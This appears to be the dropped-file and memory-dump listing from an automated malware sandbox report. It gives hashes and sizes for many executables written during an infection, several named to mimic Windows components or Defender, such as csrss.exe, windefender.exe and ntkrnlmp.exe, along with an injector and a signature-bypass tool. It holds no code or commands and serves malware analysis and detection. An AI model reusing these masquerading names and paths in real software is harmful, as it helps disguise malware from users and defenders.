5da3a881ef991e8010deed799f1a5aaf

SHA1
fea1acea7ed96d7c9788783781e90a2ea48c1a53

SHA256
f18fdb9e03546bfb98397bcb8378b505eaf4ac061749229a7ee92a1c3cf156e4

SHA512
24fbcb5353a3d51ee01f1de1bbb965f9e40e0d00e52c42713d446f12edceeb8d08b086a8687a6188decaa8f256899e24a06c424d8d73adaad910149a9c45ef09

Download Submit
C:\Users\Admin\AppData\Local\Temp\XandETC.exe
Filesize
3.7MB

MD5
3006b49f3a30a80bb85074c279acc7df

SHA1
728a7a867d13ad0034c29283939d94f0df6c19df

SHA256
f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280

SHA512
e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd

Download Submit
C:\Users\Admin\AppData\Local\Temp\XandETC.exe
Filesize
3.7MB

MD5
3006b49f3a30a80bb85074c279acc7df

SHA1
728a7a867d13ad0034c29283939d94f0df6c19df

SHA256
f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280

SHA512
e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd

Download Submit
C:\Users\Admin\AppData\Local\Temp\aafg31.exe
Filesize
312KB

MD5
f7fb4ae423a2915641dab591592496ef

SHA1
7f7a321867a971cc24867f23a7d3b498df60e21e

SHA256
965498ede96248de22734c6e80d4ca2680454be6d1a3b65665b2abe0d6b55ddd

SHA512
f2c943d520fe028acd8976d276e4ca0168411f17a9904907f08df818edd3afef86cd685127ad4de086fe599314205881b4e91c04462c71760303b1a98f69f719

Download Submit
C:\Users\Admin\AppData\Local\Temp\aafg31.exe
Filesize
312KB

MD5
f7fb4ae423a2915641dab591592496ef

SHA1
7f7a321867a971cc24867f23a7d3b498df60e21e

SHA256
965498ede96248de22734c6e80d4ca2680454be6d1a3b65665b2abe0d6b55ddd

SHA512
f2c943d520fe028acd8976d276e4ca0168411f17a9904907f08df818edd3afef86cd685127ad4de086fe599314205881b4e91c04462c71760303b1a98f69f719

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
Filesize
94KB

MD5
d98e78fd57db58a11f880b45bb659767

SHA1
ab70c0d3bd9103c07632eeecee9f51d198ed0e76

SHA256
414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0

SHA512
aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe
Filesize
3.2MB

MD5
f801950a962ddba14caaa44bf084b55c

SHA1
7cadc9076121297428442785536ba0df2d4ae996

SHA256
c3946ec89e15b24b743c46f9acacb58cff47da63f3ce2799d71ed90496b8891f

SHA512
4183bc76bdc84fb779e2e573d9a63d7de47096b63b945f9e335bee95ae28eb208f5ee15f6501ac59623b97c5b77f3455ca313512e7d9803e1704ae22a52459c5

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe
Filesize
3.2MB

MD5
f801950a962ddba14caaa44bf084b55c

SHA1
7cadc9076121297428442785536ba0df2d4ae996

SHA256
c3946ec89e15b24b743c46f9acacb58cff47da63f3ce2799d71ed90496b8891f

SHA512
4183bc76bdc84fb779e2e573d9a63d7de47096b63b945f9e335bee95ae28eb208f5ee15f6501ac59623b97c5b77f3455ca313512e7d9803e1704ae22a52459c5

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
Filesize
281KB

MD5
d98e33b66343e7c96158444127a117f6

SHA1
bb716c5509a2bf345c6c1152f6e3e1452d39d50d

SHA256
5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1

SHA512
705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
Filesize
1.7MB

MD5
13aaafe14eb60d6a718230e82c671d57

SHA1
e039dd924d12f264521b8e689426fb7ca95a0a7b

SHA256
f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

SHA512
ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

Download Submit
C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
Filesize
5.3MB

MD5
1afff8d5352aecef2ecd47ffa02d7f7d

SHA1
8b115b84efdb3a1b87f750d35822b2609e665bef

SHA256
c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1

SHA512
e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

Download Submit
C:\Users\Admin\AppData\Local\Temp\oldplayer.exe
Filesize
198KB

MD5
a64a886a695ed5fb9273e73241fec2f7

SHA1
363244ca05027c5beb938562df5b525a2428b405

SHA256
563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144

SHA512
122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

Download Submit
C:\Users\Admin\AppData\Local\Temp\oldplayer.exe
Filesize
198KB

MD5
a64a886a695ed5fb9273e73241fec2f7

SHA1
363244ca05027c5beb938562df5b525a2428b405

SHA256
563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144

SHA512
122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

Download Submit
C:\Users\Admin\AppData\Local\Temp\osloader.exe
Filesize
591KB

MD5
e2f68dc7fbd6e0bf031ca3809a739346

SHA1
9c35494898e65c8a62887f28e04c0359ab6f63f5

SHA256
b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4

SHA512
26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
b765b25cd27b849732bd2b55d4d3d4a7

SHA1
55dadb175773df380bacad5597a0263c2294c4e9

SHA256
df31a6d0fcf259415badfeaa0778ee1ddaf419114521c899d39a15d2edbcbf6f

SHA512
191c26ee66a63f212b97309cbd63ffb6153111d6c45a8c0e601d1543574d6cc7b6bb96221f4bd113b88af4e9c10e91cf6f43ee4f9a34db7ccef54ad2c0f02641

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\93UR9OV13MAGZQU34CXX.temp
Filesize
7KB

MD5
b765b25cd27b849732bd2b55d4d3d4a7

SHA1
55dadb175773df380bacad5597a0263c2294c4e9

SHA256
df31a6d0fcf259415badfeaa0778ee1ddaf419114521c899d39a15d2edbcbf6f

SHA512
191c26ee66a63f212b97309cbd63ffb6153111d6c45a8c0e601d1543574d6cc7b6bb96221f4bd113b88af4e9c10e91cf6f43ee4f9a34db7ccef54ad2c0f02641

Download Submit
C:\Windows\rss\csrss.exe
Filesize
4.2MB

MD5
1d5c8c5f65ece8bd6c534c2a4dab103f

SHA1
cb982786f558208767bc171a4c3b718b0db0ce3f

SHA256
8308179514d386fba1356aa4459f46f925d4a5b9a6f36733154d183c0780ac93

SHA512
92d814721e2a699ca50dc2a8da642d9f405c09efb7731103624eaede318b46f4803e8501aa8437b70040a8da10b97b81d64023c0111b03339a5c96f7c2c665ae

Download Submit
C:\Windows\rss\csrss.exe
Filesize
4.2MB

MD5
1d5c8c5f65ece8bd6c534c2a4dab103f

SHA1
cb982786f558208767bc171a4c3b718b0db0ce3f

SHA256
8308179514d386fba1356aa4459f46f925d4a5b9a6f36733154d183c0780ac93

SHA512
92d814721e2a699ca50dc2a8da642d9f405c09efb7731103624eaede318b46f4803e8501aa8437b70040a8da10b97b81d64023c0111b03339a5c96f7c2c665ae

Download Submit
C:\Windows\windefender.exe
Filesize
2.0MB

MD5
8e67f58837092385dcf01e8a2b4f5783

SHA1
012c49cfd8c5d06795a6f67ea2baf2a082cf8625

SHA256
166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa

SHA512
40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec

Download Submit
C:\Windows\windefender.exe
Filesize
2.0MB

MD5
8e67f58837092385dcf01e8a2b4f5783

SHA1
012c49cfd8c5d06795a6f67ea2baf2a082cf8625

SHA256
166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa

SHA512
40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec

Download Submit
C:\Windows\windefender.exe
Filesize
2.0MB

MD5
8e67f58837092385dcf01e8a2b4f5783

SHA1
012c49cfd8c5d06795a6f67ea2baf2a082cf8625

SHA256
166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa

SHA512
40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\Program Files\Notepad\Chrome\updater.exe
Filesize
3.7MB

MD5
3006b49f3a30a80bb85074c279acc7df

SHA1
728a7a867d13ad0034c29283939d94f0df6c19df

SHA256
f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280

SHA512
e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd

Download Submit
\Users\Admin\AppData\Local\Temp\1000001001\toolspub2.exe
Filesize
205KB

MD5
3a66a27b79651f7c45a136a08a44a571

SHA1
2c5ef7ea40a7f24c559818e25a166cacb9b0c6fa

SHA256
2e229f0a4035b58e6c24c519e93f56a9aad7af92405c8604e5e8cb1d23174f43

SHA512
26478e3bace13460bc2ef257eb9032c6c6f21f015b14e9c698c52f7208b9edf8c70edfaaebe08671dc675862df6a29238e14636a27e2ee06523453c6208da5d6

Download Submit
\Users\Admin\AppData\Local\Temp\1000001001\toolspub2.exe
Filesize
205KB

MD5
3a66a27b79651f7c45a136a08a44a571

SHA1
2c5ef7ea40a7f24c559818e25a166cacb9b0c6fa

SHA256
2e229f0a4035b58e6c24c519e93f56a9aad7af92405c8604e5e8cb1d23174f43

SHA512
26478e3bace13460bc2ef257eb9032c6c6f21f015b14e9c698c52f7208b9edf8c70edfaaebe08671dc675862df6a29238e14636a27e2ee06523453c6208da5d6

Download Submit
\Users\Admin\AppData\Local\Temp\1000001001\toolspub2.exe
Filesize
205KB

MD5
3a66a27b79651f7c45a136a08a44a571

SHA1
2c5ef7ea40a7f24c559818e25a166cacb9b0c6fa

SHA256
2e229f0a4035b58e6c24c519e93f56a9aad7af92405c8604e5e8cb1d23174f43

SHA512
26478e3bace13460bc2ef257eb9032c6c6f21f015b14e9c698c52f7208b9edf8c70edfaaebe08671dc675862df6a29238e14636a27e2ee06523453c6208da5d6

Download Submit
\Users\Admin\AppData\Local\Temp\1000002001\3eef203fb515bda85f514e168abb5973.exe
Filesize
4.2MB

MD5
1d5c8c5f65ece8bd6c534c2a4dab103f

SHA1
cb982786f558208767bc171a4c3b718b0db0ce3f

SHA256
8308179514d386fba1356aa4459f46f925d4a5b9a6f36733154d183c0780ac93

SHA512
92d814721e2a699ca50dc2a8da642d9f405c09efb7731103624eaede318b46f4803e8501aa8437b70040a8da10b97b81d64023c0111b03339a5c96f7c2c665ae

Download Submit
\Users\Admin\AppData\Local\Temp\1000002001\3eef203fb515bda85f514e168abb5973.exe
Filesize
4.2MB

MD5
1d5c8c5f65ece8bd6c534c2a4dab103f

SHA1
cb982786f558208767bc171a4c3b718b0db0ce3f

SHA256
8308179514d386fba1356aa4459f46f925d4a5b9a6f36733154d183c0780ac93

SHA512
92d814721e2a699ca50dc2a8da642d9f405c09efb7731103624eaede318b46f4803e8501aa8437b70040a8da10b97b81d64023c0111b03339a5c96f7c2c665ae

Download Submit
\Users\Admin\AppData\Local\Temp\1000003001\setup.exe
Filesize
365KB

MD5
d96a975ad533ddad6c1f07f03dc6f519

SHA1
4a0a9e2a723c7bcde21c62e23006329f5c0d2144

SHA256
eca00bf18be6fbab8750a2530402b780a77385eaf3b995036309f360a97fa602

SHA512
5d7231dc1b8bcecdf888eeeca72844df4402d8d14f4fbc23e7d4b54fd0017fa0ebae5cb5bcd9fd39fa737656b27d237d53ea8f5ab842f40edc29383cae2ae47f

Download Submit
\Users\Admin\AppData\Local\Temp\1000003001\setup.exe
Filesize
365KB

MD5
d96a975ad533ddad6c1f07f03dc6f519

SHA1
4a0a9e2a723c7bcde21c62e23006329f5c0d2144

SHA256
eca00bf18be6fbab8750a2530402b780a77385eaf3b995036309f360a97fa602

SHA512
5d7231dc1b8bcecdf888eeeca72844df4402d8d14f4fbc23e7d4b54fd0017fa0ebae5cb5bcd9fd39fa737656b27d237d53ea8f5ab842f40edc29383cae2ae47f

Download Submit
\Users\Admin\AppData\Local\Temp\1000003001\setup.exe
Filesize
365KB

MD5
d96a975ad533ddad6c1f07f03dc6f519

SHA1
4a0a9e2a723c7bcde21c62e23006329f5c0d2144

SHA256
eca00bf18be6fbab8750a2530402b780a77385eaf3b995036309f360a97fa602

SHA512
5d7231dc1b8bcecdf888eeeca72844df4402d8d14f4fbc23e7d4b54fd0017fa0ebae5cb5bcd9fd39fa737656b27d237d53ea8f5ab842f40edc29383cae2ae47f

Download Submit
\Users\Admin\AppData\Local\Temp\1000003001\setup.exe
Filesize
365KB

MD5
d96a975ad533ddad6c1f07f03dc6f519

SHA1
4a0a9e2a723c7bcde21c62e23006329f5c0d2144

SHA256
eca00bf18be6fbab8750a2530402b780a77385eaf3b995036309f360a97fa602

SHA512
5d7231dc1b8bcecdf888eeeca72844df4402d8d14f4fbc23e7d4b54fd0017fa0ebae5cb5bcd9fd39fa737656b27d237d53ea8f5ab842f40edc29383cae2ae47f

Download Submit
\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
Filesize
198KB

MD5
a64a886a695ed5fb9273e73241fec2f7

SHA1
363244ca05027c5beb938562df5b525a2428b405

SHA256
563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144

SHA512
122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

Download Submit
\Users\Admin\AppData\Local\Temp\XandETC.exe
Filesize
3.7MB

MD5
3006b49f3a30a80bb85074c279acc7df

SHA1
728a7a867d13ad0034c29283939d94f0df6c19df

SHA256
f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280

SHA512
e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd

Download Submit
\Users\Admin\AppData\Local\Temp\aafg31.exe
Filesize
312KB

MD5
f7fb4ae423a2915641dab591592496ef

SHA1
7f7a321867a971cc24867f23a7d3b498df60e21e

SHA256
965498ede96248de22734c6e80d4ca2680454be6d1a3b65665b2abe0d6b55ddd

SHA512
f2c943d520fe028acd8976d276e4ca0168411f17a9904907f08df818edd3afef86cd685127ad4de086fe599314205881b4e91c04462c71760303b1a98f69f719

Download Submit
\Users\Admin\AppData\Local\Temp\aafg31.exe
Filesize
312KB

MD5
f7fb4ae423a2915641dab591592496ef

SHA1
7f7a321867a971cc24867f23a7d3b498df60e21e

SHA256
965498ede96248de22734c6e80d4ca2680454be6d1a3b65665b2abe0d6b55ddd

SHA512
f2c943d520fe028acd8976d276e4ca0168411f17a9904907f08df818edd3afef86cd685127ad4de086fe599314205881b4e91c04462c71760303b1a98f69f719

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
Filesize
94KB

MD5
d98e78fd57db58a11f880b45bb659767

SHA1
ab70c0d3bd9103c07632eeecee9f51d198ed0e76

SHA256
414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0

SHA512
aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe
Filesize
3.2MB

MD5
f801950a962ddba14caaa44bf084b55c

SHA1
7cadc9076121297428442785536ba0df2d4ae996

SHA256
c3946ec89e15b24b743c46f9acacb58cff47da63f3ce2799d71ed90496b8891f

SHA512
4183bc76bdc84fb779e2e573d9a63d7de47096b63b945f9e335bee95ae28eb208f5ee15f6501ac59623b97c5b77f3455ca313512e7d9803e1704ae22a52459c5

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe
Filesize
3.2MB

MD5
f801950a962ddba14caaa44bf084b55c

SHA1
7cadc9076121297428442785536ba0df2d4ae996

SHA256
c3946ec89e15b24b743c46f9acacb58cff47da63f3ce2799d71ed90496b8891f

SHA512
4183bc76bdc84fb779e2e573d9a63d7de47096b63b945f9e335bee95ae28eb208f5ee15f6501ac59623b97c5b77f3455ca313512e7d9803e1704ae22a52459c5

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
Filesize
281KB

MD5
d98e33b66343e7c96158444127a117f6

SHA1
bb716c5509a2bf345c6c1152f6e3e1452d39d50d

SHA256
5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1

SHA512
705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\patch.exe
Filesize
1.7MB

MD5
13aaafe14eb60d6a718230e82c671d57

SHA1
e039dd924d12f264521b8e689426fb7ca95a0a7b

SHA256
f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

SHA512
ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

Download Submit
\Users\Admin\AppData\Local\Temp\dbghelp.dll
Filesize
1.5MB

MD5
f0616fa8bc54ece07e3107057f74e4db

SHA1
b33995c4f9a004b7d806c4bb36040ee844781fca

SHA256
6e58fcf4d763022b1f79a3c448eb2ebd8ad1c15df3acf58416893f1cbc699026

SHA512
15242e3f5652d7f1d0e31cebadfe2f238ca3222f0e927eb7feb644ab2b3d33132cf2316ee5089324f20f72f1650ad5bb8dd82b96518386ce5b319fb5ceb8313c

Download Submit
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
Filesize
5.3MB

MD5
1afff8d5352aecef2ecd47ffa02d7f7d

SHA1
8b115b84efdb3a1b87f750d35822b2609e665bef

SHA256
c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1

SHA512
e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

Download Submit
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
Filesize
5.3MB

MD5
1afff8d5352aecef2ecd47ffa02d7f7d

SHA1
8b115b84efdb3a1b87f750d35822b2609e665bef

SHA256
c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1

SHA512
e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

Download Submit
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
Filesize
5.3MB

MD5
1afff8d5352aecef2ecd47ffa02d7f7d

SHA1
8b115b84efdb3a1b87f750d35822b2609e665bef

SHA256
c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1

SHA512
e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

Download Submit
\Users\Admin\AppData\Local\Temp\oldplayer.exe
Filesize
198KB

MD5
a64a886a695ed5fb9273e73241fec2f7

SHA1
363244ca05027c5beb938562df5b525a2428b405

SHA256
563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144

SHA512
122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

Download Submit
\Users\Admin\AppData\Local\Temp\osloader.exe
Filesize
591KB

MD5
e2f68dc7fbd6e0bf031ca3809a739346

SHA1
9c35494898e65c8a62887f28e04c0359ab6f63f5

SHA256
b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4

SHA512
26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

Download Submit
\Users\Admin\AppData\Local\Temp\osloader.exe
Filesize
591KB

MD5
e2f68dc7fbd6e0bf031ca3809a739346

SHA1
9c35494898e65c8a62887f28e04c0359ab6f63f5

SHA256
b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4

SHA512
26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

Download Submit
\Users\Admin\AppData\Local\Temp\osloader.exe
Filesize
591KB

MD5
e2f68dc7fbd6e0bf031ca3809a739346

SHA1
9c35494898e65c8a62887f28e04c0359ab6f63f5

SHA256
b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4

SHA512
26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

Download Submit
\Users\Admin\AppData\Local\Temp\symsrv.dll
Filesize
163KB

MD5
5c399d34d8dc01741269ff1f1aca7554

SHA1
e0ceed500d3cef5558f3f55d33ba9c3a709e8f55

SHA256
e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f

SHA512
8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d

Download Submit
\Windows\rss\csrss.exe
Filesize
4.2MB

MD5
1d5c8c5f65ece8bd6c534c2a4dab103f

SHA1
cb982786f558208767bc171a4c3b718b0db0ce3f

SHA256
8308179514d386fba1356aa4459f46f925d4a5b9a6f36733154d183c0780ac93

SHA512
92d814721e2a699ca50dc2a8da642d9f405c09efb7731103624eaede318b46f4803e8501aa8437b70040a8da10b97b81d64023c0111b03339a5c96f7c2c665ae

Download Submit
\Windows\rss\csrss.exe
Filesize
4.2MB

MD5
1d5c8c5f65ece8bd6c534c2a4dab103f

SHA1
cb982786f558208767bc171a4c3b718b0db0ce3f

SHA256
8308179514d386fba1356aa4459f46f925d4a5b9a6f36733154d183c0780ac93

SHA512
92d814721e2a699ca50dc2a8da642d9f405c09efb7731103624eaede318b46f4803e8501aa8437b70040a8da10b97b81d64023c0111b03339a5c96f7c2c665ae

Download Submit
memory/316-326-0x000000013F7C0000-0x000000013FB7D000-memory.dmp

Filesize
3.7MB

Download
memory/316-283-0x000000013F7C0000-0x000000013FB7D000-memory.dmp

Filesize
3.7MB

Download
memory/324-109-0x0000000000220000-0x0000000000229000-memory.dmp

Filesize
36KB

Download
memory/428-351-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/428-344-0x0000000000B20000-0x0000000000B40000-memory.dmp

Filesize
128KB

Download
memory/428-336-0x00000000001B0000-0x00000000001D0000-memory.dmp

Filesize
128KB

Download
memory/428-348-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/428-356-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/428-349-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/428-354-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/428-338-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/428-352-0x0000000000B20000-0x0000000000B40000-memory.dmp

Filesize
128KB

Download
memory/524-238-0x000000000269B000-0x00000000026D2000-memory.dmp

Filesize
220KB

Download
memory/524-233-0x000000001B0A0000-0x000000001B382000-memory.dmp

Filesize
2.9MB

Download
memory/524-234-0x0000000001F80000-0x0000000001F88000-memory.dmp

Filesize
32KB

Download
memory/524-235-0x0000000002690000-0x0000000002710000-memory.dmp

Filesize
512KB

Download
memory/524-236-0x0000000002690000-0x0000000002710000-memory.dmp

Filesize
512KB

Download
memory/524-237-0x0000000002690000-0x0000000002710000-memory.dmp

Filesize
512KB

Download
memory/752-226-0x00000000022D0000-0x00000000022D8000-memory.dmp

Filesize
32KB

Download
memory/752-224-0x00000000024C0000-0x0000000002540000-memory.dmp

Filesize
512KB

Download
memory/752-227-0x00000000024CB000-0x0000000002502000-memory.dmp

Filesize
220KB

Download
memory/752-223-0x000000001B0F0000-0x000000001B3D2000-memory.dmp

Filesize
2.9MB

Download
memory/752-225-0x00000000024C0000-0x0000000002540000-memory.dmp

Filesize
512KB

Download
memory/792-302-0x0000000000400000-0x00000000008DF000-memory.dmp

Filesize
4.9MB

Download
memory/792-293-0x0000000000400000-0x00000000008DF000-memory.dmp

Filesize
4.9MB

Download
memory/928-340-0x000000002F6C0000-0x000000002FEE5000-memory.dmp

Filesize
8.1MB

Download
memory/928-214-0x0000000000400000-0x000000000295A000-memory.dmp

Filesize
37.4MB

Download
memory/928-282-0x0000000000400000-0x000000000295A000-memory.dmp

Filesize
37.4MB

Download
memory/928-339-0x000000002F6C0000-0x000000002FEE5000-memory.dmp

Filesize
8.1MB

Download
memory/928-342-0x0000000000400000-0x000000000295A000-memory.dmp

Filesize
37.4MB

Download
memory/928-303-0x0000000000400000-0x000000000295A000-memory.dmp

Filesize
37.4MB

Download
memory/928-250-0x0000000000400000-0x000000000295A000-memory.dmp

Filesize
37.4MB

Download
memory/928-306-0x0000000000400000-0x000000000295A000-memory.dmp

Filesize
37.4MB

Download
memory/928-309-0x0000000000400000-0x000000000295A000-memory.dmp

Filesize
37.4MB

Download
memory/928-337-0x0000000000400000-0x000000000295A000-memory.dmp

Filesize
37.4MB

Download
memory/928-170-0x0000000004220000-0x0000000004618000-memory.dmp

Filesize
4.0MB

Download
memory/928-173-0x0000000004620000-0x0000000004F0B000-memory.dmp

Filesize
8.9MB

Download
memory/1064-193-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/1116-305-0x0000000000400000-0x00000000008DF000-memory.dmp

Filesize
4.9MB

Download
memory/1116-343-0x0000000000400000-0x00000000008DF000-memory.dmp

Filesize
4.9MB

Download
memory/1116-319-0x0000000000400000-0x00000000008DF000-memory.dmp

Filesize
4.9MB

Download
memory/1116-301-0x0000000000400000-0x00000000008DF000-memory.dmp

Filesize
4.9MB

Download
memory/1192-160-0x00000000042C0000-0x00000000046B8000-memory.dmp

Filesize
4.0MB

Download
memory/1192-171-0x0000000000400000-0x000000000295A000-memory.dmp

Filesize
37.4MB

Download
memory/1204-151-0x0000000002960000-0x0000000002976000-memory.dmp

Filesize
88KB

Download
memory/1236-54-0x00000000012E0000-0x000000000171E000-memory.dmp

Filesize
4.2MB

Download
memory/1344-149-0x00000000047E0000-0x00000000050CB000-memory.dmp

Filesize
8.9MB

Download
memory/1344-128-0x00000000043E0000-0x00000000047D8000-memory.dmp

Filesize
4.0MB

Download
memory/1344-161-0x0000000000400000-0x000000000295A000-memory.dmp

Filesize
37.4MB

Download
memory/1440-347-0x0000000140000000-0x0000000140016000-memory.dmp

Filesize
88KB

Download
memory/1672-341-0x0000000000400000-0x0000000000C25000-memory.dmp

Filesize
8.1MB

Download
memory/1672-345-0x0000000000400000-0x0000000000C25000-memory.dmp

Filesize
8.1MB

Download
memory/1752-69-0x0000000000680000-0x0000000000681000-memory.dmp

Filesize
4KB

Download
memory/1768-313-0x0000000001250000-0x00000000012D0000-memory.dmp

Filesize
512KB

Download
